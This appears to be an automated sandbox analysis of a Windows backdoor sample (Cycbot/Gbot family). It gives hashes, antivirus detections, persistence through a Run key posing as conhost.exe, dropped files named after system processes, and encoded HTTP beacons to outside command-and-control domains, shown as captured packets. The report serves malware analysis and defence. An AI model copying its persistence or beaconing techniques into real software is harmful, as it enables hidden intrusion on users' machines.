Analysis Date2014-06-16 06:07:32
MD59e4fdea4da5e96999876463decda58c8
SHA12f4702f1dfaeef6d88ccd747f9bb7c4706742d4a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 3fc0b0560621b9e566911fe094ecdc73 sha1: 2e74004cd479a5cceb0587461da1d98d7fc32fb3 size: 93696
Section.rdata md5: 970e870072a9d411c01465b57e58cd63 sha1: 59b1a559f562854b112fbabd0ac898f48d345aa9 size: 4608
Section.data md5: 6c5b9544451831449e863babad704595 sha1: 9de97268e5b82a19957480cb0197dcb05ea257c4 size: 61952
Section.idive md5: 03efb92f9ba5c2fcee4ba9c8fac7c748 sha1: b2d3943d85eeb0650d3cf8a18fcb56a22093388b size: 1024
Timestamp2005-11-17 15:55:30
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1396
PEhash403e0ad439c0dc9e3f41510472acda1208ecde1e
IMPhash2155eaa149f0b1ed44a348ac9813d970
AV360 SafeGen:Trojan.Heur.KS.1
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVAvira (antivir)BDS/Gbot.aida
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-4767
AVClamAVWin.Trojan.Cycbot-4767
AVDr. WebBackDoor.Gbot.30
AVDr. WebBackDoor.Gbot.30
AVEmsisoftGen:Trojan.Heur.KS.1
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.LRI
AVEset (nod32)Win32/Kryptik.LRI
AVFortinetW32/FraudLoad.MK!tr
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Citem.DQO
AVGrisoft (avg)Citem.DQO
AVIkarusBackdoor.Win32.Gbot
AVIkarusBackdoor.Win32.Gbot
AVKasperskyTrojan.Win32.Generic
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security Essentialsno_virus
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSfreecdvideo.com
Winsock DNSonemouseklick.com
Winsock DNSpsfk.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSpsfk.com
Type: A
72.10.50.52
DNSzonetf.com
Type: A
208.73.211.199
DNSzonetf.com
Type: A
208.73.211.196
DNSzonetf.com
Type: A
208.73.211.172
DNSzonetf.com
Type: A
208.73.211.152
DNSzonetf.com
Type: A
208.73.211.235
DNSonemouseklick.com
Type: A
DNSfreecdvideo.com
Type: A
HTTP GEThttp://psfk.com/img/icons/facebook.png?v10=62&tq=gKZEtzyvreDEiUIDBo%2FBY0tFfesQq%2FEaZF7fPVtam1fRhqQRjdR7eDX%2FN9Pom9xZKrYWAHRFhPx2Vjsi9nkwyp%2F%2BvE8dKEHdpKLMyyH5D0k9kIG95Ohp9sOIr5d4%2Batwcq7JOg490reu3hDq%2BZvtlVrnrlaAqHMaNTRW9XLZc%2BHQ22Ox1R2EUs%2BjVPb%2B3VMhiN06mfpVjzJrJONbE%2Bg3w5xCTBH4LKUPFfO9wC66yTJHZzovUoTNjDqOMBG4QwNrdTEoFGlPvlytMrI1NX3OTUROoYBGsNe%2BSvABM1TdDzpkM%2FV2XT1DqyPLOOgoJqwPM8qTsVrqWDZ0%2F325bj1zPmMMorKoNOrmyBpjPvWARfomPaUH%2FQemq4vZd3oNiD2MuIm7cK7naN%2BBjyWmtiYkjvg6V5hgvP5HnXJi7wDlbVENiFlgLhN2iVJ446eob7diG35hUnWE7Bi
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 72.10.50.52:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.199:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.199:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f69636f 6e732f66   GET /img/icons/f
0x00000010 (00016)   61636562 6f6f6b2e 706e673f 7631303d   acebook.png?v10=
0x00000020 (00032)   36322674 713d674b 5a45747a 79767265   62&tq=gKZEtzyvre
0x00000030 (00048)   44456955 4944426f 25324642 59307446   DEiUIDBo%2FBY0tF
0x00000040 (00064)   66657351 71253246 45615a46 37665056   fesQq%2FEaZF7fPV
0x00000050 (00080)   74616d31 66526871 51526a64 52376544   tam1fRhqQRjdR7eD
0x00000060 (00096)   58253246 4e39506f 6d39785a 4b725957   X%2FN9Pom9xZKrYW
0x00000070 (00112)   41485246 68507832 566a7369 396e6b77   AHRFhPx2Vjsi9nkw
0x00000080 (00128)   79702532 46253242 76453864 4b454864   yp%2F%2BvE8dKEHd
0x00000090 (00144)   704b4c4d 79794835 44306b39 6b494739   pKLMyyH5D0k9kIG9
0x000000a0 (00160)   354f6870 39734f49 72356434 25324261   5Ohp9sOIr5d4%2Ba
0x000000b0 (00176)   74776371 374a4f67 34393072 65753368   twcq7JOg490reu3h
0x000000c0 (00192)   44712532 425a7674 6c56726e 726c6141   Dq%2BZvtlVrnrlaA
0x000000d0 (00208)   71484d61 4e545257 39584c5a 63253242   qHMaNTRW9XLZc%2B
0x000000e0 (00224)   48513232 4f783152 32455573 2532426a   HQ22Ox1R2EUs%2Bj
0x000000f0 (00240)   56506225 32423356 4d68694e 30366d66   VPb%2B3VMhiN06mf
0x00000100 (00256)   70566a7a 4a724a4f 4e624525 32426733   pVjzJrJONbE%2Bg3
0x00000110 (00272)   77357843 54424834 4c4b5550 46664f39   w5xCTBH4LKUPFfO9
0x00000120 (00288)   77433636 79544a48 5a7a6f76 556f544e   wC66yTJHZzovUoTN
0x00000130 (00304)   6a44714f 4d424734 51774e72 6454456f   jDqOMBG4QwNrdTEo
0x00000140 (00320)   46476c50 766c7974 4d724931 4e58334f   FGlPvlytMrI1NX3O
0x00000150 (00336)   5455524f 6f594247 734e6525 32425376   TUROoYBGsNe%2BSv
0x00000160 (00352)   41424d31 5464447a 706b4d25 32465632   ABM1TdDzpkM%2FV2
0x00000170 (00368)   58543144 7179504c 4f4f676f 4a717750   XT1DqyPLOOgoJqwP
0x00000180 (00384)   4d387154 73567271 57445a30 25324633   M8qTsVrqWDZ0%2F3
0x00000190 (00400)   3235626a 317a506d 4d4d6f72 4b6f4e4f   25bj1zPmMMorKoNO
0x000001a0 (00416)   726d7942 706a5076 57415266 6f6d5061   rmyBpjPvWARfomPa
0x000001b0 (00432)   55482532 4651656d 7134765a 64336f4e   UH%2FQemq4vZd3oN
0x000001c0 (00448)   6944324d 75496d37 634b376e 614e2532   iD2MuIm7cK7naN%2
0x000001d0 (00464)   42426a79 576d7469 596b6a76 67365635   BBjyWmtiYkjvg6V5
0x000001e0 (00480)   68677650 35486e58 4a693777 446c6256   hgvP5HnXJi7wDlbV
0x000001f0 (00496)   454e6946 6c674c68 4e326956 4a343436   ENiFlgLhN2iVJ446
0x00000200 (00512)   656f6237 64694733 3568556e 57453742   eob7diG35hUnWE7B
0x00000210 (00528)   69204854 54502f31 2e300d0a 436f6e6e   i HTTP/1.0..Conn
0x00000220 (00544)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000230 (00560)   6f73743a 20707366 6b2e636f 6d0d0a41   ost: psfk.com..A
0x00000240 (00576)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000250 (00592)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000260 (00608)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e755825 32425039 68253242 49307344   NuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a47 734e6525 32425376   ose....GsNe%2BSv
0x00000160 (00352)   41424d31 5464447a 706b4d25 32465632   ABM1TdDzpkM%2FV2
0x00000170 (00368)   58543144 7179504c 4f4f676f 4a717750   XT1DqyPLOOgoJqwP
0x00000180 (00384)   4d387154 73567271 57445a30 25324633   M8qTsVrqWDZ0%2F3
0x00000190 (00400)   3235626a 317a506d 4d4d6f72 4b6f4e4f   25bj1zPmMMorKoNO
0x000001a0 (00416)   726d7942 706a5076 57415266 6f6d5061   rmyBpjPvWARfomPa
0x000001b0 (00432)   55482532 4651656d 7134765a 64336f4e   UH%2FQemq4vZd3oN
0x000001c0 (00448)   6944324d 75496d37 634b376e 614e2532   iD2MuIm7cK7naN%2
0x000001d0 (00464)   42426a79 576d7469 596b6a76 67365635   BBjyWmtiYkjvg6V5
0x000001e0 (00480)   68677650 35486e58 4a693777 446c6256   hgvP5HnXJi7wDlbV
0x000001f0 (00496)   454e6946 6c674c68 4e326956 4a343436   ENiFlgLhN2iVJ446
0x00000200 (00512)   656f6237 64694733 3568556e 57453742   eob7diG35hUnWE7B
0x00000210 (00528)   69204854 54502f31 2e300d0a 436f6e6e   i HTTP/1.0..Conn
0x00000220 (00544)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000230 (00560)   6f73743a 20707366 6b2e636f 6d0d0a41   ost: psfk.com..A
0x00000240 (00576)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000250 (00592)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000260 (00608)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e755825 32425039 68253242 49307344   NuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
..h..0...@E
.T..
...
{y!-.
..
,
C...u.?..L
-.
.U.s3cJc..X.
DE
6B
nG.
w..^.
s...E
....,N.J.._
..
.....d
.
.

040904b0
1.0.0.3
1396
'1p2
d!A&B
eDq0
FileVersion
fSsg
PrivateBuild
ProductVersion
`$qg
sBgd
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
$1xK	0
2M>F=	Zze
) }.)3
3{A&4 bNE5d
3DCJ.<
3{U-l?
4|=DWiD
}4Uj.#y9
5>aV}G
5p6V0~
)5Yn'x#
)5|/?Z5
?*6^3y
<>6|>G
/*6n5,%
6VUwoA
6x{jme
'7+#BX;
7|L+n!
7TIAfR
)8cQs:
8m@'#C
/8,TM$
8zNq~JVw
=9)!),
9cY^,6
,9Hez15
9YFg/w-
=AbgM/A_
[A`V Kp
^,a..(XV
\?b?5a
,&B&:B
]b"c3K
BeginPaint
B[ToMg-iBw
C <4 :
CloseHandle
]CLx6c?
CoCreateInstance
CoInitialize
CopyFileW
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
CreateFileA
CreateFileMappingW
CreateFileW
CreateFontIndirectW
CreateProcessW
CreateSemaphoreW
CreateWindowExW
cyYFS5gr
@.data
DeleteCriticalSection
DeleteFileW
DeleteObject
DestroyWindow
DispatchMessageW
DK,gtS
D.M.@K
D$SOp=
-!dZLE
+[dZOK
E_|`er9
%Ef	=G
e:]H:^,C
EndDialog
EndPaint
EnterCriticalSection
EnumResourceNamesW
ExitProcess
e,XV"Q,(K7
!f#62v
FindResourceW
[f[LQs
FlushFileBuffers
FlushInstructionCache
=#>F?MS
(F+nL46>
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
FzkX$1
GDI32.dll
GetACP
GetClassInfoExW
GetClientRect
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetDlgItem
GetDlgItemTextW
GetDriveTypeW
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileAttributesW
GetFileSize
GetFileType
GetFileVersionInfoSizeW
GetFileVersionInfoW
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetParent
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryW
GetSystemTimeAsFileTime
GetTempFileNameW
GetTempPathW
GetThreadLocale
GetTickCount
GetVDMCurrentDirectories
GetVersion
GetVersionExA
GetVersionExW
GetWindow
GetWindowInfo
GetWindowRect
GetWindowTextLengthW
GjP3~G
]G(j|sOR
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
htKN=iJC&'e
H}v6{Z&G
HYDqmt
&i8@wN
ICInfo
.idive
I)f=JYY
InitializeCriticalSection
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
<iS313L
IsDebuggerPresent
IsProcessorFeaturePresent
iYO V1
Jf.M*K
Jqm]iX
@j+ZQ6
+k22b|
K)]Csb{Bg-
KERNEL32.dll
kJQW0<G
+k|P)-
-$l&c%
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadCursorW
LoadLibraryA
LoadLibraryExW
LoadLibraryW
LoadResource
LocalAlloc
LocalFree
LockResource
lstrcmpA
lstrcmpiW
lstrlenA
lstrlenW
MapViewOfFile
MapWindowPoints
MessageBoxW
MSVFW32.dll
MulDiv
MultiByteToWideChar
m=wk\^b
'=m{z_
Mz5\K=
n0=F+V
NbM->0e
!nC@!D
Nk{BkUB
nKLnH 
nTR^%O
>O8hyI.
OFZMu-
ole32.dll
On]8_W
p)}&(93
PeekMessageW
p#hFV4
!PRi|/
-|Punz
]P:)Vh
pw@Ep5
qe?sH:
QueryPerformanceCounter
R\8* p
RaiseException
`.rdata
ReadFile
RegisterClassExW
Rich`x
RtlUnwind
SetCapture
SetDlgItemTextW
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetThreadPriorityBoost
SetUnhandledExceptionFilter
SetWindowPos
SetWindowTextW
SG`]2s
SHELL32.dll
ShellExecuteW
SHGetPathFromIDListW
SHGetSpecialFolderLocation
SizeofResource
SWF >n
SystemParametersInfoW
TerminateProcess
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t:mt?j
TranslateMessage
Tu]YCNHR
txE8?v
t?Z>Ht
u{kSfVY
UnhandledExceptionFilter
UnmapViewOfFile
USER32.dll
VC*q=NiE
$_vEKh
VerQueryValueW
VERSION.dll
vFd`Z7
Vf$"fiev
{vh?0E
VirtualAlloc
VirtualFree
VQ,/eW|
WaitForSingleObject
WideCharToMultiByte
wKwMi	
#W<>-q
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileSectionW
*Xe@	M	
Xou;e-
XWo}[5
y4.'t<
<y4^%x*
Yb*(rZ
\ycT)G:
}yF$A]
YfL=l>;
<]YP:3
,ypkrq
y;yH.T
)z}]4G
z8.?S>+
ZC5fRa
z@K>m1
zm?f|s&S
Zp#QO>(c	
zs^_g(
ZVqEL!